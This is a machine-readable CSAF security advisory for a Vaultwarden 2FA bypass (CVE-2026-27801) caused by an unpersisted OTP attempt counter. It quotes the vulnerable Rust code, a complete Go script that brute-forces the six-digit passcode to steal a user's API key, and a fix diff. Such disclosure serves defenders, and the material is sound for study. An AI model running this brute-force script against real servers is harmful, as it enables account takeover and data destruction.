{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-27801",
"tracking": {
"current_release_date": "2026-03-23T03:41:41.935272Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-27801",
"initial_release_date": "2026-03-04T20:39:48.603554Z",
"revision_history": [
{
"date": "2026-03-04T20:39:48.603554Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-04T20:39:50.425055Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-04T21:38:33.093076Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)."
},
{
"date": "2026-03-04T21:38:41.366353Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-04T22:25:29.508683Z",
"number": "5",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)."
},
{
"date": "2026-03-04T22:25:32.887070Z",
"number": "6",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-05T11:06:15.455226Z",
"number": "7",
"summary": "Source created.| CVE status created. (valid)| Products created (1).| References created (6)."
},
{
"date": "2026-03-05T11:06:17.764389Z",
"number": "8",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-05T12:30:37.645191Z",
"number": "9",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1).| Vendor_assessment created."
},
{
"date": "2026-03-05T12:30:39.428322Z",
"number": "10",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-05T14:14:09.377696Z",
"number": "11",
"summary": "Source created.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-05T14:14:15.149106Z",
"number": "12",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-05T16:16:05.774927Z",
"number": "13",
"summary": "References created (1)."
},
{
"date": "2026-03-05T16:39:47.687182Z",
"number": "14",
"summary": "Unknown change."
},
{
"date": "2026-03-06T20:26:20.114430Z",
"number": "15",
"summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
},
{
"date": "2026-03-06T20:26:24.471617Z",
"number": "16",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T09:39:45.830317Z",
"number": "17",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-20T09:39:48.606180Z",
"number": "18",
"summary": "NCSC Score updated."
}
],
"status": "interim",
"version": "18"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<1.35.0",
"product": {
"name": "vers:unknown/<1.35.0",
"product_id": "CSAFPID-5761788"
}
}
],
"category": "product_name",
"name": "Vaultwarden"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/<1.35.0",
"product": {
"name": "vers:unknown/<1.35.0",
"product_id": "CSAFPID-5759381",
"product_identification_helper": {
"cpe": "cpe:2.3:a:dani-garcia:vaultwarden:*:*:*:*:*:*:*:*"
}
}
}
],
"category": "product_name",
"name": "vaultwarden"
}
],
"category": "vendor",
"name": "dani-garcia"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27801",
"cwe": {
"id": "CWE-307",
"name": "Improper Restriction of Excessive Authentication Attempts"
},
"notes": [
{
"category": "description",
"text": "### Summary\n\nVaultwarden v1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user’s account can exploit this bypass to perform protected actions such as accessing the user's API key or deleting the user's vault and organisations the user is an admin/owner of.\n\nNote that \n\n\n### Details\n\nWithin Vaultwarden, the `PasswordOrOtpData` struct is used to gate certain protected actions such as account deletion behind a 2FA validation. This validation requires the user to either re-enter their master password, or to enter a one-time passcode sent to their email address.\n\nBy default, the one-time passcode is comprised of six digits, and the expiry time for each token is ten minutes. The validation of this one-time passcode is performed by the following function:\n\n```rust\npub async fn validate_protected_action_otp(\n otp: &str,\n user_id: &UserId,\n delete_if_valid: bool,\n conn: &mut DbConn,\n) -> EmptyResult {\n let pa = TwoFactor::find_by_user_and_type(user_id, TwoFactorType::ProtectedActions as i32, conn)\n .await\n .map_res(\"Protected action token not found, try sending the code again or restart the process\")?;\n let mut pa_data = ProtectedActionData::from_json(&pa.data)?;\n\n pa_data.add_attempt();\n // Delete the token after x attempts if it has been used too many times\n // We use the 6, which should be more then enough for invalid attempts and multiple valid checks\n if pa_data.attempts > 6 {\n pa.delete(conn).await?;\n err!(\"Token has expired\")\n }\n\n // Check if the token has expired (Using the email 2fa expiration time)\n let date =\n DateTime::from_timestamp(pa_data.token_sent, 0).expect(\"Protected Action token timestamp invalid.\").naive_utc();\n let max_time = CONFIG.email_expiration_time() as i64;\n if date + TimeDelta::try_seconds(max_time).unwrap() < Utc::now().naive_utc() {\n pa.delete(conn).await?;\n err!(\"Token has expired\")\n }\n\n if !crypto::ct_eq(&pa_data.token, otp) {\n pa.save(conn).await?;\n err!(\"Token is invalid\")\n }\n\n if delete_if_valid {\n pa.delete(conn).await?;\n }\n\n Ok(())\n}\n```\n\nSince the one-time passcode is only six-digits long, it has significantly less entropy than a typical password or secret key. Hence, Vaultwarden attempts to prevent brute-force attacks against this passcode by enforcing a rate limit of 6 attempts per code. However, the number of attempts made by the user is not persisted correctly.\n\nIn the `validate_protected_action_top` function, Vaultwarden first reads the OTP data from a JSON blob stored in `pa.data`. The resulting `ProtectedActionData` structure is then a deserialised copy of the underlying JSON value.\n\n```rust\nlet mut pa_data = ProtectedActionData::from_json(&pa.data)?;\n```\n\nNext, Vaultwarden calls `pa_data.add_attempt()` in order to increment the number of attempts made by one. This increments the attempt count on the local structure, but does not modify the value of the `pa.data`.\n\n```rust\npub fn add_attempt(&mut self) {\n self.attempts += 1;\n}\n```\n\nFinally, if the OTP validation fails, Vaultwarden attempts to persist the updated attempt count by calling `pa.save(conn)`. However since we only modified a copy of `pa.data`, the value of `pa.data.attempts` remains at zero.\n\nThe probability of a successful brute force depends on the OTP token length, the OTP expiry duration, and the request throughput. Since each request issued by the attacker does not depend on any previous requests, network latency is not a factor. The bottleneck then, will likely be either the attacker’s network bandwidth or Vaultwarden’s request processing throughput. From local testing, rates of up to 2500 requests per second were achievable, which successfuly bruteforced the OTP in 3 minutes.\n\nIf the attacker’s request throughput is low, they can also make repeated requests to `/api/accounts/request-otp` to generate new tokens. Their probability of success is then\n\n```math\n1 - \\left(1 - \\frac{R * T}{10^L}\\right)^n,\n```\n\nwhere $R$ is the number of requests per second, $T$ is the token expiry time in seconds, $L$ is the number of digits in the OTP code, and $n$ is the number of OTP tokens requested.\n\n\n\n\n### Proof of Concept\n\nThe easiest method of demonstrating this vulnerability is by making an (authenticated) request to the `/api/accounts/request-otp` endpoint to generate an OTP, and then repeatedly sending invalid guesses to `/api/accounts/verify-otp`. After six guesses, Vaultwarden will still reply `\"Token is invalid\"` in response to an incorrect guess, rather than `\"Token has expired\"` as expected when the rate limit is exceeded. Upon entering the correct OTP, the code will still validate despite more than six guesses being made.\n\nFor a more practical example, the following Go script will brute force the OTP in order to read the user’s API key.\n\n```go\npackage main\n\nimport (\n\t\"bytes\"\n\t\"context\"\n\t\"crypto/tls\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io\"\n\t\"log\"\n\t\"net/http\"\n\t\"sync\"\n\t\"sync/atomic\"\n\t\"time\"\n)\n\nconst (\n\thost = \"https://10.10.0.1:8000\"\n\tjwtToken = \"...\"\n\tconcurrency = 100\n\ttotalOtps = 1000000\n)\n\ntype Brute struct {\n\tclient *http.Client\n}\n\nfunc NewBrute() *Brute {\n\ttr := &http.Transport{\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\treturn &Brute{\n\t\tclient: &http.Client{Transport: tr},\n\t}\n}\n\nfunc (v *Brute) RequestOTP() error {\n\treq, err := http.NewRequest(\"POST\", host+\"/api/accounts/request-otp\", nil)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to create OTP request: %w\", err)\n\t}\n\treq.Header.Set(\"Authorization\", \"Bearer \"+jwtToken)\n\n\tresp, err := v.client.Do(req)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to send OTP request: %w\", err)\n\t}\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK && resp.StatusCode != http.StatusBadRequest {\n\t\treturn fmt.Errorf(\"unexpected status code for OTP request: %d\", resp.StatusCode)\n\t}\n\n\tfmt.Println(\"Requested OTP successfully\")\n\treturn nil\n}\n\nfunc (v *Brute) GetAPIKey(ctx context.Context, otp string) (bool, error) {\n\tpayload, _ := json.Marshal(map[string]string{\"otp\": otp})\n\tbody := bytes.NewBuffer(payload)\n\n\treq, err := http.NewRequestWithContext(ctx, \"POST\", host+\"/api/accounts/api-key\", body)\n\tif err != nil {\n\t\treturn false, fmt.Errorf(\"failed to create verification request: %w\", err)\n\t}\n\treq.Header.Set(\"Authorization\", \"Bearer \"+jwtToken)\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tresp, err := v.client.Do(req)\n\tif err != nil {\n\t\treturn false, err\n\t}\n\tdefer resp.Body.Close()\n\n\tswitch resp.StatusCode {\n\tcase http.StatusOK:\n\t\tbody, err := io.ReadAll(resp.Body)\n\t\tif err == nil {\n\t\t\tfmt.Println(\"\\n-----\\n\" + string(body) + \"\\n-----\\n\")\n\t\t}\n\t\treturn true, nil\n\tcase http.StatusBadRequest:\n\t\treturn false, nil\n\tdefault:\n\t\treturn false, fmt.Errorf(\"unexpected status code for verification: %d\", resp.StatusCode)\n\t}\n}\n\nfunc progressTracker(ctx context.Context, counter *uint64, start time.Time) {\n\tticker := time.NewTicker(300 * time.Millisecond)\n\tdefer ticker.Stop()\n\n\tfor {\n\t\tselect {\n\t\tcase <-ctx.Done():\n\t\t\tdone := atomic.LoadUint64(counter)\n\t\t\telapsed := time.Since(start).Seconds()\n\t\t\trps := 0.0\n\t\t\tif elapsed > 0 {\n\t\t\t\trps = float64(done) / elapsed\n\t\t\t}\n\t\t\tfmt.Printf(\"\\rprogress: %d/%d (%.2f%%) | %.2f req/sec | elapsed: %.1fs\\n\", done, totalOtps, float64(done)/float64(totalOtps)*100, rps, elapsed)\n\t\t\treturn\n\t\tcase <-ticker.C:\n\t\t\tdone := atomic.LoadUint64(counter)\n\t\t\telapsed := time.Since(start).Seconds()\n\t\t\trps := 0.0\n\t\t\tif elapsed > 0 {\n\t\t\t\trps = float64(done) / elapsed\n\t\t\t}\n\t\t\tfmt.Printf(\"\\rprogress: %d/%d (%.2f%%) | %.2f req/sec | elapsed: %.1fs\", done, totalOtps, float64(done)/float64(totalOtps)*100, rps, elapsed)\n\t\t}\n\t}\n}\n\nfunc main() {\n\tbrute := NewBrute()\n\tif err := brute.RequestOTP(); err != nil {\n\t\tlog.Fatalf(\"Error: %v\", err)\n\t}\n\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tvar wg sync.WaitGroup\n\tvar counter uint64\n\tstartTime := time.Now()\n\n\tgo progressTracker(ctx, &counter, startTime)\n\n\tchunkSize := totalOtps / concurrency\n\tfor i := 0; i < concurrency; i++ {\n\t\tstart := i * chunkSize\n\t\tend := start + chunkSize\n\t\tif i == concurrency-1 {\n\t\t\tend = totalOtps\n\t\t}\n\n\t\twg.Add(1)\n\t\tgo func(s, e int) {\n\t\t\tdefer wg.Done()\n\t\t\tfor otpNum := s; otpNum < e; otpNum++ {\n\t\t\t\tselect {\n\t\t\t\tcase <-ctx.Done():\n\t\t\t\t\treturn\n\t\t\t\tdefault:\n\t\t\t\t}\n\n\t\t\t\totpStr := fmt.Sprintf(\"%06d\", otpNum)\n\t\t\t\tsuccess, err := brute.GetAPIKey(ctx, otpStr)\n\n\t\t\t\tatomic.AddUint64(&counter, 1)\n\n\t\t\t\tif err != nil {\n\t\t\t\t\tselect {\n\t\t\t\t\tcase <-ctx.Done():\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tlog.Printf(\"\\nError verifying OTP %s: %v\", otpStr, err)\n\t\t\t\t\t\tcancel()\n\t\t\t\t\t}\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif success {\n\t\t\t\t\tfmt.Printf(\"\\n\\nSuccess: Found OTP = %s\\n\", otpStr)\n\t\t\t\t\tcancel()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}(start, end)\n\t}\n\n\twg.Wait()\n\tfmt.Println(\"Brute-force attempt finished.\")\n}\n```\n![\"image\"](\"https://github.com/user-attachments/assets/61486bb6-302b-4edb-87b7-d229bbd33380\")
\n\n### Impact\n\nAn attacker who gains access to a user’s account can exploit this bypass to perform protected actions such as accessing the user’s API key or deleting the user’s accounts and organisations.\n\n### Remediation\n\nThe simplest fix is to ensure the updated number of attempts is persisted by calling `pa.data = pa_data.to_json()` before calling `pa.save(conn)`. However this still leaves open the possibility of an attacker requesting an OTP code, exhausting their six attempts and then requesting a new code to try. This attack succeeds with probability\n\n```math\n1 - \\left(1 - \\frac{6}{10^L}\\right)^n,\n```\n\nwhich becomes non-neglible as $n$ increases.\n\nTherefore the best approach might be to enforce a delay like this, to ensure that all rate limits are ultimately tied back to time:\n\n```diff\ndiff --git a/src/api/core/two_factor/protected_actions.rs b/src/api/core/two_factor/protected_actions.rs\nindex 5e4a65be..aa9cb8f6 100644\n--- a/src/api/core/two_factor/protected_actions.rs\n+++ b/src/api/core/two_factor/protected_actions.rs\n@@ -66,7 +66,18 @@ async fn request_otp(headers: Headers, mut conn: DbConn) -> EmptyResult {\n if let Some(pa) =\n TwoFactor::find_by_user_and_type(&user.uuid, TwoFactorType::ProtectedActions as i32, &mut conn).await\n {\n- pa.delete(&mut conn).await?;\n+ let pa_data = ProtectedActionData::from_json(&pa.data)?;\n+ let token_sent = DateTime::from_timestamp(pa_data.token_sent, 0)\n+ .expect(\"Protected Action token timestamp invalid\")\n+ .naive_utc();\n+ let elapsed = Utc::now().naive_utc() - token_sent;\n+ let delay = TimeDelta::seconds(20);\n+\n+ if elapsed < delay {\n+ err!(format!(\"Please wait {} seconds before requesting another code.\", (delay - elapsed).num_seconds()));\n+ } else {\n+ pa.delete(&mut conn).await?;\n+ }\n }\n\n let generated_token = crypto::generate_email_token(CONFIG.email_token_size());\n@@ -131,6 +142,7 @@ pub async fn validate_protected_action_otp(\n }\n\n if !crypto::ct_eq(&pa_data.token, otp) {\n+ pa.data = pa_data.to_json();\n pa.save(conn).await?;\n err!(\"Token is invalid\")\n }\n```",
"title": "github - https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
},
{
"category": "description",
"text": "Vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. Vaultwarden versions 1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user’s account can exploit this bypass to perform protected actions such as accessing the user’s API key or deleting the user’s vault and organisations the user is an admin/owner of . This issue has been patched in version 1.35.0.",
"title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27801"
},
{
"category": "description",
"text": "Vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. Vaultwarden versions 1.34.3 and prior are susceptible to a 2FA bypass when performing protected actions. An attacker who gains authenticated access to a user’s account can exploit this bypass to perform protected actions such as accessing the user’s API key or deleting the user’s vault and organisations the user is an admin/owner of . This issue has been patched in version 1.35.0.",
"title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
},
{
"category": "description",
"text": "No description is available for this CVE.\nThis MODERATE vulnerability allows an authenticated attacker to bypass 2FA for protected actions via faulty rate limiting. Exploitation requires network access and low privileges (valid account). Impact includes high confidentiality loss (API key exposure), high integrity loss (vault/org deletion), and high availability loss (data destruction). Red Hat ships Vaultwarden in its community products.",
"title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27801"
},
{
"category": "other",
"text": "0.00031",
"title": "EPSS"
},
{
"category": "other",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
},
{
"category": "other",
"text": "6.0",
"title": "CVSSV4 base score"
},
{
"category": "other",
"text": "4.1",
"title": "NCSC Score"
},
{
"category": "other",
"text": "There is product data available from source Certbundde",
"title": "NCSC Score top increasing factors"
},
{
"category": "other",
"text": "The value of the most recent EPSS score, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
"title": "NCSC Score top decreasing factors"
},
{
"category": "details",
"text": "Severity: 2\n",
"title": "Vendor assessment"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5759381",
"CSAFPID-5761788"
]
},
"references": [
{
"category": "external",
"summary": "Source - github",
"url": "https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
},
{
"category": "external",
"summary": "Source raw - github",
"url": "https://api.github.com/advisories/GHSA-v6pg-v89r-w8wr"
},
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27801"
},
{
"category": "external",
"summary": "Source raw - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27801.json"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
},
{
"category": "external",
"summary": "Source raw - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27801"
},
{
"category": "external",
"summary": "Source - certbundde",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0594.json"
},
{
"category": "external",
"summary": "Source - redhat",
"url": "https://access.redhat.com/security/cve/CVE-2026-27801"
},
{
"category": "external",
"summary": "Source raw - redhat",
"url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27801.json"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27801"
},
{
"category": "external",
"summary": "Source raw - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; redhat",
"url": "https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-v6pg-v89r-w8wr"
},
{
"category": "external",
"summary": "Reference - certbundde; github",
"url": "https://github.com/advisories/GHSA-v6pg-v89r-w8wr"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0594.json"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0594"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-h4hq-rgvh-wh27"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-r32r-j5jq-3w4m"
},
{
"category": "external",
"summary": "Reference - certbundde",
"url": "https://github.com/advisories/GHSA-w9f8-m526-h7fh"
},
{
"category": "external",
"summary": "Reference - redhat",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27801"
},
{
"category": "external",
"summary": "Reference - github; redhat",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27801"
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 8.8,
"baseSeverity": "HIGH"
},
"products": [
"CSAFPID-5759381",
"CSAFPID-5761788"
]
}
],
"title": "CVE-2026-27801"
}
]
}